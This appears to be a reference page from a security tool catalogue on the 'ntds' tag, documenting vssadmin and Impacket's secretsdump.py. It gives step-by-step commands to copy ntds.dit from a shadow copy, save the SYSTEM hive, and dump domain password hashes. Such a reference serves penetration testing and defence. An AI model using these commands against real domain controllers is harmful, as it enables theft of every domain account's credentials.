ntds – Security Slice

⚠ Only present on Domain Controllers

Description

The Windows Volume Shadow Service. It can be use to make copies of files that are currently in use (including ntds.dit).

Platform	Windows
Author	Microsoft
License	Windows
URL	vssadmin

Usage

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
---- Commands Supported ----
 
Delete Shadows        - Delete volume shadow copies
List Providers        - List registered volume shadow copy providers
List Shadows          - List existing volume shadow copies
List ShadowStorage    - List volume shadow copy storage associations
List Volumes          - List volumes eligible for shadow copies
List Writers          - List subscribed volume shadow copy writers
Resize ShadowStorage  - Resize a volume shadow copy storage association

Examples

vssadmin list shadows

This will list any existing shadow copies.

C:\WINDOWS\system32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
Contents of shadow copy set ID: {34e68305-975f-4d17-8655-4993d495a4e7}
   Contained 1 shadow copies at creation time: 3/17/2022 5:14:25 PM
      Shadow Copy ID: {670f6106-3968-4656-a8cc-a822f2222719}
         Original Volume: (C:)\\?\Volume{f99d1339-fef8-4d0c-92f0-df3a6876270d}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DESKTOP-TI18DM9
         Service Machine: DESKTOP-TI18DM9
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

You can then copy files from the shadow volume, like ntds.dit for example.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

Then you need to copy the SYSTEM hive to get the encryption key.

reg save hklm\system C:\windows\temp\system /y

vssadmin create shadow /for=c:

This will create a new shadow copy of the C drive. Alternatively, you can run this command in Powershell.

(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')

Blog Posts

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\\Temp dir) and read the rest of the data from there.

Platform	Python
Author	Alberto Solino
License	Modified Apache License 1.1
URL	secretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This will dump the hashes from a saved copy of ntds.dit using the encryption key in a saved copy of the SYSTEM hive.

Blog Posts

Tag: ntds